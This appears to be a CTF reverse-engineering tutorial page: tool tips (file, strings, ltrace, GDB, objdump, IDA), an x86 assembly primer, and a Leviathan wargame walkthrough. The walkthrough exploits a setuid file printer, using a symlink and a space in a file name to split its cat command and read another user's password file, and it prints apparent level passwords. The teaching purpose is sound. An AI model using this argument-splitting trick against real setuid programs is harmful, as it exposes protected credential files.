Reverse Engineering

bvi : visual editor for binary files

This post collects lessons learned while solving Reverse Engineering challenges in CTFs.

Suppose we are given a binary to reverse engineer, for example one that asks for a password.

file: The first step is to run the file command on the binary, which tells us whether it is 32-bit or 64-bit, statically or dynamically linked, stripped or not, and so on.

bitvijays@kali:~/Desktop/CTF/31C3$ file cfy
cfy: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0x9bc623f046535fba50a2124909fb871e5daf198e, not stripped
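As a rough illustration of where file gets some of these facts, the sketch below decodes the first bytes of an ELF header in Python. The function name describe_elf and the hand-built sample header are made up for this example; only the ELF field layout (e_ident, e_type, e_machine) is standard. Whether a binary is statically or dynamically linked is not visible in these bytes (it comes from the program headers), so the sketch does not try to report it.

```python
import struct

def describe_elf(header: bytes) -> dict:
    """Decode the ELF header fields that `file` summarises (hypothetical helper)."""
    if header[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    ei_class, ei_data = header[4], header[5]
    bits = {1: 32, 2: 64}[ei_class]          # EI_CLASS: 1 = 32-bit, 2 = 64-bit
    endian = {1: "<", 2: ">"}[ei_data]       # EI_DATA: 1 = LSB, 2 = MSB
    # e_type and e_machine are two 16-bit fields right after the 16-byte e_ident.
    e_type, e_machine = struct.unpack_from(endian + "HH", header, 16)
    return {
        "bits": bits,
        "byte_order": "LSB" if endian == "<" else "MSB",
        "type": {1: "relocatable", 2: "executable", 3: "shared object"}.get(e_type, "other"),
        "machine": {3: "x86", 62: "x86-64"}.get(e_machine, "other"),
    }

# Hand-built header (an assumption, not read from cfy): 64-bit, LSB, executable, x86-64.
sample = b"\x7fELF" + bytes([2, 1, 1, 0]) + bytes(8) + struct.pack("<HH", 2, 62)
print(describe_elf(sample))
```

To try it on a real binary, pass the first 20 bytes of the file, for example open("cfy", "rb").read(20).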

The second step could be running strings or “hexdump -C” on it, especially for very simple RE challenges where the binary asks for a password that is stored in an array.

bitvijays@kali:~$ strings check
/lib/ld-linux.so.2
D$,1
D$%secrf
D$)et
D$ love
T$,e3
[^_]
password:
/bin/sh
Wrong password, Good Bye ...
;*2$"

hexdump -C check | more
00000540  31 c0 c7 44 24 18 73 65  78 00 c7 44 24 25 73 65  |1..D$.sex..D$%se|
00000550  63 72 66 c7 44 24 29 65  74 c6 44 24 2b 00 c7 44  |crf.D$)et.D$+..D|
00000560  24 1c 67 6f 64 00 c7 44  24 20 6c 6f 76 65 c6 44  |$.god..D$ love.D|
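The hexdump shows more than strings did because strings only prints runs of at least four printable characters by default, so three-letter values hidden between instruction bytes are dropped. The sketch below is a simplified imitation of that behaviour in Python, applied to the 48 bytes from the hexdump above; printable_runs is a name invented for this example and it ignores details of the real tool (such as treating tabs as printable).

```python
import re

def printable_runs(data: bytes, min_len: int = 4) -> list:
    """Return runs of printable ASCII at least min_len long, roughly like `strings -n`."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [run.decode("ascii") for run in pattern.findall(data)]

# The three hexdump rows shown above, offsets 0x540 to 0x56f.
dump = bytes.fromhex(
    "31 c0 c7 44 24 18 73 65 78 00 c7 44 24 25 73 65 "
    "63 72 66 c7 44 24 29 65 74 c6 44 24 2b 00 c7 44 "
    "24 1c 67 6f 64 00 c7 44 24 20 6c 6f 76 65 c6 44 "
)

print(printable_runs(dump))      # default threshold of 4
print(printable_runs(dump, 3))   # lower threshold also shows 3-character runs
```

With the real tool, the equivalent of the second call would be strings -n 3 check.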

The next step could be running strace or ltrace on the binary.

strace: traces system calls and signals.
ltrace: traces library calls.

GDB Commands:

info file: Shows the entry point and the address range of each section.
info functions: Lists the functions in the binary.

ObjDump

```

objdump -Dj .text

# objdump disassembles all (-D) of the first file given by the invoker, but
# prints only the ".text" section (-j .text), the only section that matters
# in almost any compiled program.

```

IDA

Search strings in IDA: Open the “strings window” by either pressing Shift+F12 or going to View > Open Subviews > Strings in the toolbar.
Want to convert Hex to ASCII?

mov     [ebp+var_28], 46h
mov     [ebp+var_27], 4Ch
mov     [ebp+var_26], 41h
Select the hex value and press the “R” key. If you select multiple values together, a “Convert to Char en masse” pop-up appears; select “Operand value range”, set Lower value to “0x00” and Upper value to “0xFF”, and convert.
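The same conversion can be checked outside IDA. The sketch below pulls the hex immediates out of the three mov lines above and decodes them as ASCII; immediates_to_text is a name invented for this example, and it assumes every immediate is a single byte written in IDA's trailing-h notation.

```python
import re

def immediates_to_text(asm_lines):
    """Collect the trailing hex immediate (e.g. 46h) of each line and decode as ASCII."""
    values = []
    for line in asm_lines:
        match = re.search(r",\s*([0-9A-Fa-f]+)h\s*$", line)
        if match:
            values.append(int(match.group(1), 16))
    return bytes(values).decode("ascii")

listing = [
    "mov     [ebp+var_28], 46h",
    "mov     [ebp+var_27], 4Ch",
    "mov     [ebp+var_26], 41h",
]
print(immediates_to_text(listing))  # prints FLA
```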

Appendix-I Assembly Basics

Assembly Program

An assembly program can be divided into three sections

The data section,
The bss section, and
The text section

The data section

Used for declaring initialized data or constants.
This data doesn’t change at runtime.
Can declare various constant values, filenames or buffer sizes.

Syntax

section .data

The bss section

Used for declaring variables (uninitialized storage).

Syntax

section .bss

The text section

Used for keeping the actual code.
Must begin with the declaration global _start, which exports the entry symbol so that the linker knows where program execution begins.

Syntax

section .text
   global _start
_start:

An assembly language comment begins with a semicolon (;). It may contain any printable character, including blanks. It can appear on a line by itself, like:

; This program displays a message on screen

or on the same line along with an instruction, like:

add eax, ebx     ; adds ebx to eax

Assembly language programs consist of three types of statements

Executable instructions, or simply instructions, tell the processor what to do. Each instruction consists of an operation code (opcode). Each executable instruction generates one machine language instruction.
Assembler directives or pseudo-ops tell the assembler about the various aspects of the assembly process. These are non-executable and do not generate machine language instructions.
Macros are basically a text substitution mechanism.

Syntax

Statements are entered one per line, in the following format

[label]   mnemonic   [operands]   [;comment]

The fields in the square brackets are optional. A basic instruction has two parts,

the first one is the name of the instruction (or the mnemonic), which is to be executed, and
the second is the operands, or parameters, of the command.
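To make the statement format concrete, here is a minimal Python sketch that splits one source line into the four fields. parse_statement is a name invented for this example, and it makes simplifying assumptions that a real assembler does not: a label must end with a colon, and neither semicolons nor commas appear inside string operands.

```python
def parse_statement(line):
    """Split '[label] mnemonic [operands] [;comment]' into its fields (simplified)."""
    code, sep, comment = line.partition(";")
    parts = code.split(None, 1)
    label = None
    # Assumption: a label is a first token that ends with ':'.
    if parts and parts[0].endswith(":"):
        label = parts[0][:-1]
        parts = parts[1].split(None, 1) if len(parts) > 1 else []
    mnemonic = parts[0] if parts else None
    operand_text = parts[1] if len(parts) > 1 else ""
    operands = [op.strip() for op in operand_text.split(",") if op.strip()]
    return {
        "label": label,
        "mnemonic": mnemonic,
        "operands": operands,
        "comment": comment.strip() if sep else None,
    }

print(parse_statement("add eax, ebx     ; adds ebx to eax"))
print(parse_statement("_start:"))
```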

A good guide to follow is the `x86 Assembly Guide <http://www.cs.virginia.edu/~evans/cs216/guides/x86.html>`_.

Registers

Memory and Addressing Modes

Data declarations should be preceded by the .DATA directive. Following this directive, the directives DB, DW, and DD can be used to declare one, two, and four byte data locations, respectively. Declared locations can be labeled with names for later reference — this is similar to declaring variables by name, but abides by some lower level rules.

Example declarations:

.DATA
var     DB 64            ; Declare a byte, referred to as location var, containing the value 64.
var2    DB ?             ; Declare an uninitialized byte, referred to as location var2.
        DB 10            ; Declare a byte with no label, containing the value 10. Its location is var2 + 1.
X       DW ?             ; Declare a 2-byte uninitialized value, referred to as location X.
Y       DD 30000         ; Declare a 4-byte value, referred to as location Y, initialized to 30000.

An array can be declared by just listing the values, as in the first example below. Two other common methods used for declaring arrays of data are the DUP directive and the use of string literals. The DUP directive tells the assembler to duplicate an expression a given number of times. For example, 4 DUP(2) is equivalent to 2, 2, 2, 2.

Examples:

Z          DD 1, 2, 3    ; Declare three 4-byte values, initialized to 1, 2, and 3. The value of location Z + 8 will be 3.
bytes      DB 10 DUP(?)  ; Declare 10 uninitialized bytes starting at location bytes.
arr        DD 100 DUP(0) ; Declare 100 4-byte words starting at location arr, all initialized to 0
str        DB 'hello',0  ; Declare 6 bytes starting at the address str, initialized to the ASCII character values for hello and the null (0) byte.
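The byte layout these declarations produce can be mimicked with Python's struct module. This is only an illustration of the resulting memory image, assuming little-endian x86; the helpers dd and db are invented for this example and are not assembler features.

```python
import struct

def dd(*values):
    """Pack each value as a 4-byte little-endian integer, like DD."""
    return struct.pack("<%dI" % len(values), *values)

def db(*values):
    """Pack each value as a single byte, like DB."""
    return bytes(values)

Z = dd(1, 2, 3)             # Z   DD 1, 2, 3
arr = dd(0) * 100           # arr DD 100 DUP(0)
text = b"hello" + db(0)     # str DB 'hello',0

print(struct.unpack_from("<I", Z, 8)[0])   # the 4-byte value at Z + 8
print(len(arr), len(text))                 # sizes in bytes
```

The first print shows 3, matching the comment on Z above, and the sizes come out as 400 and 6 bytes.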

The mov instruction moves data between registers and memory. It has two operands: the first is the destination and the second is the source.

mov eax, [ebx]           ; Move the 4 bytes in memory at the address contained in EBX into EAX
mov [var], ebx           ; Move the contents of EBX into the 4 bytes at memory address var. (Note, var is a 32-bit constant).
mov eax, [esi-4]         ; Move 4 bytes at memory address ESI + (-4) into EAX
mov [esi+eax], cl        ; Move the contents of CL into the byte at address ESI+EAX
mov edx, [esi+4*ebx]     ; Move the 4 bytes of data at address ESI+4*EBX into EDX

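Usually the size of the data at a memory address can be inferred from the register operand, but an instruction such as mov [ebx], 2 is ambiguous: it could store 1, 2 or 4 bytes. The assembler must be told which size is intended. The size directives BYTE PTR, WORD PTR, and DWORD PTR serve this purpose, indicating sizes of 1, 2, and 4 bytes respectively.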

For example:

mov BYTE  PTR [ebx], 2   ; Move 2 into the single byte at the address stored in EBX.
mov WORD  PTR [ebx], 2   ; Move the 16-bit integer representation of 2 into the 2 bytes starting at the address in EBX.
mov DWORD PTR [ebx], 2   ; Move the 32-bit integer representation of 2 into the 4 bytes starting at the address in EBX.
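The effect of the three size directives can be seen by writing the value 2 into a small buffer with different widths. The sketch below models memory as a Python bytearray pre-filled with 0xff so the untouched bytes stay visible; store and demo are names invented for this example.

```python
def store(memory, address, value, size):
    """Write value into `size` bytes at `address`, little-endian as on x86."""
    memory[address:address + size] = value.to_bytes(size, "little")

def demo(size):
    memory = bytearray(b"\xff" * 4)   # pre-filled so untouched bytes stay visible
    store(memory, 0, 2, size)
    return memory.hex()

print(demo(1))  # like mov BYTE  PTR [ebx], 2 -> 02ffffff
print(demo(2))  # like mov WORD  PTR [ebx], 2 -> 0200ffff
print(demo(4))  # like mov DWORD PTR [ebx], 2 -> 02000000
```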

The lea instruction places the address specified by its second operand into the register specified by its first operand. Note, the contents of the memory location are not loaded, only the effective address is computed and placed into the register. This is useful for obtaining a pointer into a memory region.

Syntax

lea <reg32>,<mem>

Examples

lea edi, [ebx+4*esi]     ; the quantity EBX+4*ESI is placed in EDI.
lea eax, [var]           ; the address of var (not the value stored there) is placed in EAX.
lea eax, [val]           ; if val is a constant, the value val itself is placed in EAX.
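The difference between lea and a mov from memory can be sketched with a toy model: both compute the same effective address, but only mov reads memory. The functions, register values and the 32-byte memory below are all invented for illustration.

```python
def effective_address(base=0, index=0, scale=1, disp=0):
    """Compute base + index*scale + disp, wrapped to 32 bits."""
    return (base + index * scale + disp) & 0xFFFFFFFF

def lea(base=0, index=0, scale=1, disp=0):
    """lea: return the computed address itself; memory is never touched."""
    return effective_address(base, index, scale, disp)

def mov_load(memory, base=0, index=0, scale=1, disp=0):
    """mov reg, [mem]: read the 4 little-endian bytes at the computed address."""
    address = effective_address(base, index, scale, disp)
    return int.from_bytes(memory[address:address + 4], "little")

memory = bytearray(32)                               # toy memory, hypothetical contents
memory[16:20] = (0xDEADBEEF).to_bytes(4, "little")
ebx, esi = 4, 3

edi = lea(base=ebx, index=esi, scale=4)               # lea edi, [ebx+4*esi]
eax = mov_load(memory, base=ebx, index=esi, scale=4)  # mov eax, [ebx+4*esi]
print(hex(edi), hex(eax))
```

Here lea yields the address 0x10, while mov yields the data stored at that address.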

Jump Statements

Signedness doesn’t matter.

Instr	Description	Flags
JO	Jump if overflow	OF = 1
JNO	Jump if not overflow	OF = 0
JS	Jump if sign	SF = 1
JNS	Jump if not sign	SF = 0
JE / JZ	Jump if equal / Jump if zero	ZF = 1
JNE / JNZ	Jump if not equal / Jump if not zero	ZF = 0
JP / JPE	Jump if parity / Jump if parity even	PF = 1
JNP / JPO	Jump if no parity / Jump if parity odd	PF = 0
JCXZ / JECXZ	Jump if CX is zero / Jump if ECX is zero	CX = 0 / ECX = 0

Unsigned Ones

Instr	Description	signed-ness	Flags
JB / JNAE / JC	Jump if below / Jump if not above or equal / Jump if carry	unsigned	CF = 1
JNB / JAE / JNC	Jump if not below / Jump if above or equal / Jump if not carry	unsigned	CF = 0
JBE / JNA	Jump if below or equal / Jump if not above	unsigned	CF = 1 or ZF = 1
JA / JNBE	Jump if above / Jump if not below or equal	unsigned	CF = 0 and ZF = 0

Signed Ones

Instr	Description	signed-ness	Flags
JL / JNGE	Jump if less / Jump if not greater or equal	signed	SF <> OF
JGE / JNL	Jump if greater or equal / Jump if not less	signed	SF = OF
JLE / JNG	Jump if less or equal / Jump if not greater	signed	ZF = 1 or SF <> OF
JG / JNLE	Jump if greater / Jump if not less or equal	signed	ZF = 0 and SF = OF
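To see why the same comparison can take an unsigned jump but not the signed one, the sketch below computes the flags a 32-bit cmp a, b would set and evaluates a few conditions from the tables above. cmp_flags and taken are names invented for this example, and only a handful of jumps are modelled.

```python
MASK = 0xFFFFFFFF

def cmp_flags(a, b):
    """Flags after a 32-bit `cmp a, b`, which computes a - b and discards the result."""
    a &= MASK
    b &= MASK
    result = (a - b) & MASK
    return {
        "CF": int(a < b),                          # unsigned borrow
        "ZF": int(result == 0),
        "SF": result >> 31,                        # sign bit of the result
        "OF": ((a ^ b) & (a ^ result)) >> 31,      # signed overflow of a - b
    }

def taken(jump, f):
    """Evaluate a few of the jump conditions listed in the tables."""
    conditions = {
        "JE": f["ZF"] == 1,
        "JB": f["CF"] == 1,
        "JA": f["CF"] == 0 and f["ZF"] == 0,
        "JL": f["SF"] != f["OF"],
        "JG": f["ZF"] == 0 and f["SF"] == f["OF"],
    }
    return conditions[jump]

# 0xFFFFFFFF is the largest unsigned value, but -1 when read as signed.
flags = cmp_flags(0xFFFFFFFF, 1)
print(flags, taken("JA", flags), taken("JL", flags))
```

For this pair both JA and JL are taken: the value is above 1 when treated as unsigned and less than 1 when treated as signed.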

Examples

Consider a binary which is setuid and used to read files.

leviathan2@melinda:~$ ./printfile
*** File Printer ***
Usage: ./printfile filename

leviathan2@melinda:~$ ls -la
-r-sr-x---   1 leviathan3 leviathan2 7498 Nov 14 10:32 printfile

We need to read the password file of leviathan3, which only leviathan3 can read:

leviathan2@melinda:~$ ls -l /etc/leviathan_pass/leviathan3
-r-------- 1 leviathan3 leviathan3 11 Nov 14 10:32 /etc/leviathan_pass/leviathan3

Let’s see the ltrace of the binary while accessing a file which we are allowed to read

leviathan2@melinda:~$ ltrace ./printfile /etc/leviathan_pass/leviathan2
__libc_start_main(0x804852d, 2, 0xffffd774, 0x8048600 <unfinished ...>
access("/etc/leviathan_pass/leviathan2", 4)                                                                            = 0
snprintf("/bin/cat /etc/leviathan_pass/lev"..., 511, "/bin/cat %s", "/etc/leviathan_pass/leviathan2")                  = 39
system("/bin/cat /etc/leviathan_pass/lev"...ougahZi8Ta
<no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                                                                                                 = 0
+++ exited (status 0) +++

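So it’s a matter of tricking access(). If the call to access() succeeds, the program calls system(“/bin/cat file”), so passing a file we can read, such as printfile /etc/issue, works. The weakness is that access() checks the whole argument as a single path using our real user ID, while system() hands the string to the shell, which splits it at spaces before cat runs with the privileges of the setuid binary. We can exploit this by using a space in our file name. First we create a symlink to the password file and call it foo: ln -s /etc/leviathan_pass/leviathan3 foo. Then we create a file named “foo bar”: touch foo\ bar. access() approves “foo bar”, which we own, but cat is asked to print foo and bar as two separate files.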

leviathan2@melinda:~$ mkdir /tmp/levi
leviathan2@melinda:~$ cd /tmp/levi
leviathan2@melinda:/tmp/levi$ ls
leviathan2@melinda:/tmp/levi$ ln -s /etc/leviathan_pass/leviathan3 ./foo
leviathan2@melinda:/tmp/levi$ touch foo\ bar
leviathan2@melinda:/tmp/levi$ ~/printfile foo\ bar
Ahdiemoo1j
/bin/cat: bar: No such file or directory
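The word splitting that makes this work can be reproduced in Python with shlex.split, which tokenises a string in roughly the way a POSIX shell does. This is only a model of the behaviour seen in the ltrace output, not the source of printfile; cat_command is a name invented for this example, and the quoted variant is shown purely to contrast how the same string would be split if the file name were quoted.

```python
import shlex

def cat_command(filename):
    """Build the command string the way the snprintf() call in the ltrace output does."""
    return "/bin/cat %s" % filename

# access() sees one path: "foo bar". The shell sees three words.
unquoted = shlex.split(cat_command("foo bar"))
print(unquoted)

# With the file name quoted, the shell keeps it as a single argument.
quoted = shlex.split(cat_command(shlex.quote("foo bar")))
print(quoted)
```

The first list contains foo and bar as separate arguments, which is why cat printed the symlinked password file and then complained about bar.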